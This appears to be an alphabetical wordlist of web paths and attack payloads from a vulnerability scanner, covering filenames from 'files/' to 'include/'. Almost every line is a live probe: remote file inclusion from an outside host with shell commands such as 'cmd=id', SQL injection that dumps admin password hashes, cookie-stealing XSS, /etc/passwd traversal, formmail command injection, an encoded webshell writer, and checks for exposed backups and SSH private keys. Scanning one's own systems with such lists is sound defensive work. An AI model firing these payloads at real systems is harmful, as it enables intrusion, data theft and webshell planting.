files/message-read.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-reply.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-replyall.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-search.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/open-flash-chart/open-flash-chart.swf?get-data=(function(){alert(document.domain)})()
fileserver
findix/index.php?page=http://www.yxlink.com/nvs_test.txt?&cmd=id
firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
fishcart_v3/fc_functions/fc_example.php?docroot=http://www.yxlink.com/nvs_test.txt
fix1.php
flash
flash/flowplayer/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
flash/jwplayer/player.swf?playerready=alert(document.domain)&debug=function(){alert(document.domain)}
flash/open-flash-chart/open-flash-chart.swf?get-data=(function(){alert(document.domain)})()
flash/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
flash_upload.php?modelid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%280x7c,md5(333333)%29%20from%20phpcms_member%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23
flowplayer
flowplayer.swf
flushcmd/Include/editor/rich_files/class.rich.php?class_path=http://www.yxlink.com/nvs_test.txt?
folder
follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELECT%201%2c1%2c1%2c1%2c1%2cCONCAT(md5(333)%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1
fom.cgi?file=<script>alert('Vulnerable')</script>
fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
fonctions/template.php?repphp=http://www.yxlink.com/nvs_test.txt?
fonctions_racine.php?chemin_lib=http://www.yxlink.com/nvs_test.txt
fonts
foo.php3
footer.inc.php?settings[footer]=http://www.yxlink.com/nvs_test.txt
footer.inc.php?tfooter=http://www.yxlink.com/nvs_test.txt
footer.php
footer.php?footer_file=http://www.yxlink.com/nvs_test.txt
footer.php?op[footer_body]=http://www.yxlink.com/nvs_test.txt?
foots.php
forgot
forgot_password.php?email=\x5C\x22><script>alert(document.cookie)</script>
form.php?path=http://www.yxlink.com/nvs_test.txt?&cmd=pwd
formmail
formmail.cgi
formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
formmail.pl
formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
forms
forum.php?acuparam=>\x22><ScRiPt>alert(213771818860)</ScRiPt>
forum.php?cfg_file=1&fpath=http://www.yxlink.com/nvs_test.txt?
forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4NEU1NjUzNUY1NDQ1NTM1NCxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5
forum/forum.php?view=http://www.yxlink.com/nvs_test.txt
forum/forum82lib.php3?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/forum_admin.php?create.edit.9999999%0Aunion%0Aselect%0A1,2,md5(333),4,5,6,7,8,9,10,11,12,13,14
forum/gesfil.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/include/common.php?pun_root=http://www.yxlink.com/nvs_test.txt
forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
forum/lostpassword.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/mail.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/member.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\x5C\x22>\x5C\x22<script>javascript:alert(document.cookie)</script>
forum/message.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/misc.php?action=hmflags&cnam=-Belgium'+UNION%20SELECT%201,group_concat(md5(333),0x3a,password,0x3a,salt,0x3b),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164+FROM+mybb_users%20WHERE%20uid=1--+&pf=5
forum/search.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/track.php?path=http://www.yxlink.com/nvs_test.txt
forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
forumdisplay.php?GLOBALS[]=1&f=2&comma=\x5C\x22.system('id').\x5C\x22
forumdisplay.php?acuparam=>\x22><ScRiPt>alert(2112)</ScRiPt>
forummission.php?index=show&amp;id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,MD5(333),0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
forummission.php?index=show&id=24%27
forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; 
forums/member.php?action=profile&uid=\xE2\x80\x98
forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
fpadmin
fr
frame.php?framefile=http://www.yxlink.com/nvs_test.txt
friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
frontend
frontend/x/net/dnslook.html?dns=\x22><script>alert(666)</script>
frontend/x3/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=\x22><script>alert(222)</script>
frontpage.php?setup_folder=http://www.yxlink.com/nvs_test.txt
frontpage.php?setup_folder=shell.txt?
ftb.imagegallery.aspx?frame=1&rif=..&cif=\x5C..
ftp
ftp.php?path_local=http://www.yxlink.com/nvs_test.txt
fuck.php
function.inc.php?path=http://www.yxlink.com/nvs_test.txt
function.php?adminfolder=http://www.yxlink.com/nvs_test.txt
function.php?gbpfad=http://www.yxlink.com/nvs_test.txt
functions.php?include_path=http://www.yxlink.com/nvs_test.txt
functions.php?pmp_rel_path=http://www.yxlink.com/nvs_test.txt
functions.php?s[phppath]=http://www.yxlink.com/nvs_test.txt
functions.php?set_path=http://www.yxlink.com/nvs_test.txt?
functions/form.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions/general.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions/groups.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions/js.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions/prepend_adm.php?SETS[path][physical]=http://www.yxlink.com/nvs_test.txt
functions/sections.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions/users.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions_mod_user.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?&cmd=ls
fusebox5.php?FUSEBOX_APPLICATION_PATH=http://www.yxlink.com/nvs_test.txt
g
g.php
gQ3fmjHsiq.jsp
galerie.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?cmd=id
gallery/captionator.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
gallery/errors/configmode.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
gallery/errors/reconfigure.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
gallery/errors/unconfigured.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
gallery/folderview.asp?folder=<script>alert (3333)</script>
gallery/lib/content.php?include=http://www.yxlink.com/nvs_test.txt?cmd=ls
gallery/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
gallery/theme/include_mode/template.php?galleryfilesdir=http://www.yxlink.com/nvs_test.txt
gallerypath/index.php?includepath=http://www.yxlink.com/nvs_test.txt
games.php?id=http://www.yxlink.com/nvs_test.txt
games.php?scoreid=http://www.yxlink.com/nvs_test.txt
ganglia/
gb/form.inc.php3?lang=http://www.yxlink.com/nvs_test.txt
gbook/includes/header.php?abspath=http://www.yxlink.com/nvs_test.txt?
gcms/code/error.php?path_prefix=http://www.yxlink.com/nvs_test.txt
gemini/page/forums/bottom.php?lang=http://www.yxlink.com/nvs_test.txt?
gen_m3u.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
genepi.php?topdir=http://www.yxlink.com/nvs_test.txt
general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(bnZzX3Rlc3RfZ2V0d2Vic2hlbGw))}
general/email/index.php
general/email/shell.php
generate.php?ht_pfad=http://www.yxlink.com/nvs_test.txt?
genericons
genpage-cgi.php?REP_INC=http://www.yxlink.com/nvs_test.txt
gepi/gestion/savebackup.php?filename=http://www.yxlink.com/nvs_test.txt&cmd=cat/etc/passwd
gestArt/aide.php3?aide=http://www.yxlink.com/nvs_test.txt?
getPass.php?email=test@test.com&update=s
get_od_toc.pl?Profile=
get_session_vars.php?path_to_smf=http://www.yxlink.com/nvs_test.txt
getpage.php?page=online&doc_path=http://www.yxlink.com/nvs_test.txt
global
global.asa
global.asa.bak
global.asa.old
global.asa.orig
global.asa.temp
global.asa.tmp
global.asax.bak
global.asax.old
global.asax.orig
global.asax.temp
global.asax.tmp
global.php?abs_path=http://www.yxlink.com/nvs_test.txt?
global/phpthumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
globals
go.cgi?artarchive=|id|
goform/CheckLogin?login=root&password=tslinux
gorum/dbproperty.php?appDirName=http://www.yxlink.com/nvs_test.txt
gov/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
gpb/include/db.mysql.inc.php?root_path=http://www.yxlink.com/nvs_test.txt
gpb/include/gpb.inc.php?root_path=http://www.yxlink.com/nvs_test.txt
graph.php?DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
graphics
group
group-summary.jsp?search=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E<!--
group/search.php?sad=g&keyword=%cf'
groups_profile.php?gid=311\x22><script>alert(222)</script>
gruntFile.js
gruppen.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
gs/plugins/editors/fckeditor
guanli/
guanliyuan/
guest/Ask/MyAskList.aspx?QueType=1%27%20union%20select%201,str%28123.4,8,4%29,3,4,5,6,88888888-1,8,9,10,11%20from%20sysobjects--
guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
guestbook/guestbook.html
guides/index.php?lang=0&CODE=02&id=1'
gulpfile.js
h
h.php
h0umen.php
hack.php
hack.php?H_name=bank\x22><script>alert(111)</script>
hacker.php
handlers/email/mod.listmail.php?_PM_[path][handle]=http://www.yxlink.com/nvs_test.txt
handlers/page/show.php?sous_rep=http://www.yxlink.com/nvs_test.txt
head.php?APB_SETTINGS%5Btemplate_path%5D=http://www.yxlink.com/nvs_test.txt
head.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
header.inc.php?CssFile=http://www.yxlink.com/nvs_test.txt
header.php?path=http://www.yxlink.com/nvs_test.txt
header.php?wwwRoot=http://www.yxlink.com/nvs_test.txt
headeruserdata.php?groupname='%20UNION SELECT md5(333)%20FROM%20authors%23
help
help.html
help.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
help.php?chapter=<script>alert('Vulnerable')</script>
help.php?css_path=http://www.yxlink.com/nvs_test.txt
help/
help/1%27
help/advanced/content.jsp?'onload='alert(0)
help/index.jsp?'onload='alert(0)
help/index.php?show=http://www.yxlink.com/nvs_test.txt
help/readme.nsf/Header?OpenPage=&BaseTarget=%22;//%20--%3E%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
help/wwhelp/wwhimpl/js/html/wwhelp.htm
help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.yxlink.com/nvs_test.txt
helperfunction.php?includedir=http://www.yxlink.com/nvs_test.txt
hioxBannerRotate.php?hm=http://www.yxlink.com/nvs_test.txt
hioxRandomAd.php?hm=http://www.yxlink.com/nvs_test.txt
hioxstats.php?hm=http://www.yxlink.com/nvs_test.txt
hioxupdate.php?hm=http://www.yxlink.com/nvs_test.txt
history/historyFrame.html
hit.php?url_hit=http://www.yxlink.com/nvs_test.txt?
hit.php?url_hithttp://www.yxlink.com/nvs_test.txt%00
holiday.php?hid=-2+union+select+1,2,3,md5(333),5,6,7,8+from+information_schema.tables+where+table_schema=database()--
holiday_book.php?hid=-2+union+select+1,2,3,md5(333),5,6,7,8+from+information_schema.tables+where+table_schema=database()--
home.php
home.php?a=http://www.yxlink.com/nvs_test.txt
home.php?arsc_language=elvish
home.php?genres_parent=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
home.php?genres_parent=-1%20union/**/select/**/1,concat(MD5(333),%27%20%27,version()),3,4,5,6--
home.php?page=http://www.yxlink.com/nvs_test.txt
home.php?pagina=http://www.yxlink.com/nvs_test.txt
home/cache/cachedata.stat.php
home/www/images/doc/index2.php?type=http://www.yxlink.com/nvs_test.txt
home1.php?ln=http://www.yxlink.com/nvs_test.txt
home2.php?ln=http://www.yxlink.com/nvs_test.txt
homepage.php/admin/member-profile
horde
horde/imp/test.php
horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
horde/test.php
horde/test.php?mode=phpinfo
horde/util/barcode.php?type=../../../../../../../../../../../etc/passwd%00
host-manager/html/add?name=<script>alert(222)</script>&aliases=somealias
hostadmin/?page='
houmen.php
houtai/
hp-ux/
hp_docs/
hp_docs/cgi-bin/index.cgi
hp_docs/xmltools/
hpp/
hsList.php?subdir=http://www.yxlink.com/nvs_test.txt?&cmd=ls
htaccess.bak
htaccess.txt
htbin/
htdoc/
htdocs
htdocs/gmapfactory/params.php?gszAppPath=http://www.yxlink.com/nvs_test.txt
htgrep?file=index.html&hdr=/etc/passwd
htim_enu/start.swe/?>'\x22><script>alert(111)</script>
htimage.exe/path/filename?2,2
html
html/
html/admin/modules/plugin_admin.php?_settings[pluginpath]=http://www.yxlink.com/nvs_test.txt
html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
html/cgi-bin/cgicso?query=AAA
html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/js/editor/fckeditor
html/js/misc/swfupload//swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
html/js/misc/swfupload//swfupload_f8.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
html/js/misc/swfupload//swfupload_f9.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/sessions?path=/&sort=\x22><script>alert(33)</script>
html/yui/uploader/assets/uploader.swf?allowedDomain=\x22})))}catch(e){alert(document.domain);}//
htmltonuke.php?filnavn=http://www.yxlink.com/nvs_test.txt
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
htsearch?-c/nonexistant
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
htsearch?exclude=%60/etc/passwd%60
http_error/ 
https-admserv/bin/index?/<script>alert(document.cookie)</script>
hu/modules/reg-new/modstart.php?mod_dir=http://www.yxlink.com/nvs_test.txt?
hydd.php
i
i.php
i_head.php?home=http://www.yxlink.com/nvs_test.txt
i_nav.php?home=http://www.yxlink.com/nvs_test.txt
icon
icons
icons/
icons/README
id_dsa
id_dsa.ppk
id_rsa
ideabox/include.php?gorumDir=http://www.yxlink.com/nvs_test.txt
ideabox/include.php?ideaDir=http://www.yxlink.com/nvs_test.txt
idssvc/idssvc.jsp
ieccredit.php?action=list&uid=\x22><script>alert(123)</script>
iesvc/iesvc.jsp
iframe.php?file=http://www.yxlink.com/nvs_test.txt
iisadmin
iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
iishelp
iishelp/iis/htm/tutorial/redirect.asp
iishelp/iis/misc/default.asp
iissamples/exair/howitworks/Winmsdp.exe
iissamples/exair/howitworks/codebrws.asp
iissamples/issamples/SQLQHit.asp
iissamples/issamples/Winmsdp.exe
iissamples/issamples/codebrws.asp
iissamples/issamples/ixqlang.htm
iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/sqlqhit.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/Winmsdp.exe
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/codebrws.asp
image
image.php?url=http://www.yxlink.com/nvs_test.txt???
image/
images
images/
images/?pattern=/etc/*&sort=name
images/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
imcws/axis2-admin/axis2-admin/axis2-web/axis2-admin/axis2-admin/engagingglobally?submit=%2bEngage%2b&modules=<script>alert(1)</script>
img
img-backup.7z
img-backup.rar
img-backup.sql
img-backup.sql.gz
img-backup.sql.tar
img-backup.tar
img-backup.tar.gz
img-backup.zip
img-database.7z
img-database.rar
img-database.sql
img-database.sql.gz
img-database.sql.tar
img-database.tar
img-database.tar.gz
img-database.zip
img-db.7z
img-db.rar
img-db.sql
img-db.sql.gz
img-db.sql.tar
img-db.tar
img-db.tar.gz
img-db.zip
img-dump.7z
img-dump.rar
img-dump.sql
img-dump.sql.gz
img-dump.sql.tar
img-dump.tar
img-dump.tar.gz
img-dump.zip
img.7z
img.rar
img.sql
img.sql.gz
img.sql.tar
img.tar
img.tar.gz
img.zip
img/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
img_backup.7z
img_backup.rar
img_backup.sql
img_backup.sql.gz
img_backup.sql.tar
img_backup.tar
img_backup.tar.gz
img_backup.zip
img_database.7z
img_database.rar
img_database.sql
img_database.sql.gz
img_database.sql.tar
img_database.tar
img_database.tar.gz
img_database.zip
img_db.7z
img_db.rar
img_db.sql
img_db.sql.gz
img_db.sql.tar
img_db.tar
img_db.tar.gz
img_db.zip
img_dump.7z
img_dump.rar
img_dump.sql
img_dump.sql.gz
img_dump.sql.tar
img_dump.tar
img_dump.tar.gz
img_dump.zip
imgbackup.7z
imgbackup.rar
imgbackup.sql
imgbackup.sql.gz
imgbackup.sql.tar
imgbackup.tar
imgbackup.tar.gz
imgbackup.zip
imgdb.7z
imgdb.rar
imgdb.sql
imgdb.sql.gz
imgdb.sql.tar
imgdb.tar
imgdb.tar.gz
imgdb.zip
imp/horde/test.php
imp/horde/test.php?mode=phpinfo
imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
impex/ImpExData.php?systempath=http://www.yxlink.com/nvs_test.txt
import
import.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
importinfo.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
in.php?returnpath=http://www.yxlink.com/nvs_test.txt
inc
inc.php?url_index=http://www.yxlink.com/nvs_test.txt
inc/articles.inc.php?GLOBALS[CHEMINMODULES]=http://www.yxlink.com/nvs_test.txt
inc/cmses/aedating4CMS.php?dir[inc]=http://www.yxlink.com/nvs_test.txt
inc/cmses/aedatingCMS.php?dir[inc]=http://www.yxlink.com/nvs_test.txt
inc/cmses/aedatingCMS2.php?dir[inc]=http://www.yxlink.com/nvs_test.txt
inc/config.inc.php?x[1]=http://www.yxlink.com/nvs_test.txt
inc/design.inc.php?dir[data]=http://www.yxlink.com/nvs_test.txt
inc/download_center_lite.inc.php?script_root=http://www.yxlink.com/nvs_test.txt
inc/extensions.php?mode=extensions&ext=\x22><script>alert(333)</script>
inc/fckeditor
inc/formmail.inc.php?script_root=http://www.yxlink.com/nvs_test.txt
inc/gabarits.php?cfg_racine=http://www.yxlink.com/nvs_test.txt
inc/header.inc.php?ficStyle=http://www.yxlink.com/nvs_test.txt
inc/ifunctions.php?GLOBALS[phpQRootDir]=http://www.yxlink.com/nvs_test.txt
inc/inc.php?cfg_racine=http://www.yxlink.com/nvs_test.txt?
inc/indexhead.php?fileloc=http://www.yxlink.com/nvs_test.txt?
inc/irayofuncs.php?irayodirhack=http://www.yxlink.com/nvs_test.txt
inc/libs/Smarty_Compiler.class.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.display_debug_console.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.load_plugins.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.load_resource_plugin.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.process_cached_inserts.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.process_compiled_include.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.read_cache_file.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/linkbar.php?cfile=http://www.yxlink.com/nvs_test.txt?
inc/login.php?pathCGX=http://www.yxlink.com/nvs_test.txt
inc/logingecon.php?pathCGX=http://www.yxlink.com/nvs_test.txt
inc/ltdialogo.php?pathCGX=http://www.yxlink.com/nvs_test.txt
inc/mtdialogo.php?pathCGX=http://www.yxlink.com/nvs_test.txt
inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.yxlink.com/nvs_test.txt?
inc/prepend.inc.php?path=http://www.yxlink.com/nvs_test.txt?
inc/sendmail.inc
inc/service.alert.inc.php?SPL_CFG[dirroot]=http://www.yxlink.com/nvs_test.txt?
inc/settings.php?inc_dir=http://www.yxlink.com/nvs_test.txt
inc/settings.ses.php?SPL_CFG[dirroot]=http://www.yxlink.com/nvs_test.txt?
inc/shows.inc.php?cutepath=http://www.yxlink.com/nvs_test.txt?
inc/sige_init.php?SYS_PATH=http://www.yxlink.com/nvs_test.txt?
inc/tiny_mce
inc/tinymce
inc/uploadify/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}//&.swf
inc2.php?url_index=http://www.yxlink.com/nvs_test.txt
inc_group.php?include_path=http://www.yxlink.com/nvs_test.txt
inc_manager.php?include_path=http://www.yxlink.com/nvs_test.txt
inc_newgroup.php.php?include_path=http://www.yxlink.com/nvs_test.txt
inc_smb_conf.php?include_path=http://www.yxlink.com/nvs_test.txt
inc_user.php?include_path=http://www.yxlink.com/nvs_test.txt
include
include.php?_APP_RELATIVE_PATH=http://www.yxlink.com/nvs_test.txt
include.php?file=atk/popups/colorpicker.inc&field=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
include.php?gorumDir=http://www.yxlink.com/nvs_test.txt
include.php?myng_root=http://www.yxlink.com/nvs_test.txt
include.php?path=contact.php&contact_email=\x5C\x22>&lt;script&gt;alert(document.cookie);&lt;/script&gt;
include.php?path=psp/user.php&site=http://www.yxlink.com/nvs_test.txt
include.php?path[docroot]=http://www.yxlink.com/nvs_test.txt
include.php?sunPath=http://www.yxlink.com/nvs_test.txt
include/
include/Beautifier/Core.php?BEAUT_PATH=http://www.yxlink.com/nvs_test.txt
include/HTML_oben.php?include_path=http://www.yxlink.com/nvs_test.txt
include/SQuery/gameSpy2.php?libpath=http://www.yxlink.com/nvs_test.txt
include/bbs.lib.inc.php?site_path=http://www.yxlink.com/nvs_test.txt
include/ckeditor/plugins/jwplayer/jwplayer/player.swf?playerready=alert(document.domain)&debug=function(){alert(document.domain)}
include/class_yapbbcooker.php?cfgIncludeDirectory=http://www.yxlink.com/nvs_test.txt
include/classes.php?INCLUDE_DIR=http://www.yxlink.com/nvs_test.txt?
include/client.php?INCLUDE_DIR=http://www.yxlink.com/nvs_test.txt? 
include/cls_headline_prod.php?INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt
include/cls_listorders.php?INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt
include/cls_viewpastorders.php?INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt
include/common.php?XOOPS_ROOT_PATH=http://www.yxlink.com/nvs_test.txt
include/common_functions.php?baros_path=http://www.yxlink.com/nvs_test.txt?
include/config.inc.php?racine=http://www.yxlink.com/nvs_test.txt
include/config_settings.php?config[include_path]=http://www.yxlink.com/nvs_test.txt
include/copyright.php?tsep_config[absPath]=http://www.yxlink.com/nvs_test.txt?cmd=ls
include/customize.php?l=http://www.yxlink.com/nvs_test.txt&text=Hello%20World
include/customize.php?l=http://www.yxlink.com/nvs_test.txt&text=Hello%20World 
include/default_header.php?script_path=http://www.yxlink.com/nvs_test.txt
include/define.php?INC_DIR=http://www.yxlink.com/nvs_test.txt?
include/disp_form.php3?cfg_include_dir=http://www.yxlink.com/nvs_test.txt?
include/disp_smileys.php3?cfg_include_dir=http://www.yxlink.com/nvs_test.txt?
include/dom.php?path=http://www.yxlink.com/nvs_test.txt
include/dtd.php?path=http://www.yxlink.com/nvs_test.txt
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.yxlink.com/nvs_test.txt?
include/engine/content/elements/menu.php?CONFIG[AdminPath]=http://www.yxlink.com/nvs_test.txt
include/extjs//examples/feed-viewer/feed-proxy.php?feed=http://testasp.vulnweb.com/t/fit.txt
include/extjs/resources//charts.swf
include/fckeditor
include/forms.php?INCLUDE_DIR=http://www.yxlink.com/nvs_test.txt?
include/global.php?pfad=http://www.yxlink.com/nvs_test.txt
include/header.php?cs_base_path=http://www.yxlink.com/nvs_test.txt?
include/help.php?base=http://www.yxlink.com/nvs_test.txt
include/html/nettools.popup.php?DIR=http://www.yxlink.com/nvs_test.txt
include/inc.foot.php?root=http://www.yxlink.com/nvs_test.txt
include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.yxlink.com/nvs_test.txt
include/inc_freigabe.php?include_path=http://www.yxlink.com/nvs_test.txt
include/inc_freigabe1.php?include_path=http://www.yxlink.com/nvs_test.txt
include/inc_freigabe3.php?include_path=http://www.yxlink.com/nvs_test.txt
include/include_stream.inc.php?include_path=http://www.yxlink.com/nvs_test.txt
include/include_top.php?g_include=http://www.yxlink.com/nvs_test.txt
include/includes.php?include_path=http://www.yxlink.com/nvs_test.txt
include/index.php3?cfg_include_dir=http://www.yxlink.com/nvs_test.txt?
include/init.inc.php?G_PATH=http://www.yxlink.com/nvs_test.txt
include/issue_edit.php?INCLUDE_DIR=http://www.yxlink.com/nvs_test.txt?
include/javascript/tiny_mce
include/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http://testasp.vulnweb.com/t/fit.txt
include/js/extjs/resources//charts.swf
include/jump.php?gurl=%23\x22</script><script>alert(/123/)</script>/*
include/lib/lib_slots.php?main_path=http://www.yxlink.com/nvs_test.txt
include/lib/lib_stats.php?main_path=http://www.yxlink.com/nvs_test.txt?
include/lib/lib_users.php?main_path=http://www.yxlink.com/nvs_test.txt?
include/listall.inc.php?mysqlcall=http://www.yxlink.com/nvs_test.txt
include/little_news.php3?cfg_include_dir=http://www.yxlink.com/nvs_test.txt?
include/livre_include.php?no_connect=lol&chem_absolu=http://www.yxlink.com/nvs_test.txt?
include/loading.php?path_include=http://www.yxlink.com/nvs_test.txt
include/mail.inc.php?root=http://www.yxlink.com/nvs_test.txt
include/menu_builder.php?config[page_dir]=http://www.yxlink.com/nvs_test.txt?
include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://www.yxlink.com/nvs_test.txt
include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.yxlink.com/nvs_test.txt?
include/parser.php?path=http://www.yxlink.com/nvs_test.txt
include/pear/IT.php?basepath=http://www.yxlink.com/nvs_test.txt
include/pear/ITX.php?basepath=http://www.yxlink.com/nvs_test.txt
include/pear/IT_Error.php?basepath=http://www.yxlink.com/nvs_test.txt
include/phpxd/phpXD.php?appconf[rootpath]=http://www.yxlink.com/nvs_test.txt?&cmd=id
